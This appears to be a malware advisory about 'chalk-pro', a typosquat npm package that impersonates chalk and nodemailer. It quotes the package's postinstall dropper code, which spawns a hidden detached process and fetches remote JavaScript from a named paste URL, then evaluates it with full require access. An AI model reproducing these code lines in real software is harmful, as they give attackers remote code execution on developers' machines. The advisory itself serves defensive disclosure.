Malicious code in chalk-pro (npm)

__

Source: amazon-inspector (ac66dfb6013c32d34c6ce83bdba4628b67539e81df27fe18dcf71d3de05ff8ce)

Package is published as 'chalk-pro' (homepage chalk-pro.com) but its main entry is a verbatim copy of nodemailer's API — a typosquat impersonating both chalk and nodemailer, with 'Andris Reinman' (the real nodemailer author) listed as author. The package.json postinstall hook runs node lib/utils/index.js, which uses child_process.spawn(process.execPath, [filePath], { detached: true, stdio: ['ignore','ignore','ignore'] }) followed by child.unref() to launch lib/utils/smtp-connection/index.js as a detached, fully-silenced child so npm install returns immediately while the dropper continues in the background. The dropper executes require('axios').get('https://www.jsonkeeper.com/b/TOAAK').then(r => new Function('require', r.data.cookie)(require)) — fetching attacker-controlled JavaScript from a mutable paste host and evaluating it with new Function at install time, with full access to require. A second file (lib/utils/smtp-connection/parse.js) provides AES-256-CBC decryption with a hardcoded key and IV, positioned to decrypt follow-up stages delivered as hex. This is a classic install-time dropper: typosquat lure + detached/silenced postinstall + remote eval from a mutable third-party paste + bundled second-stage decryptor.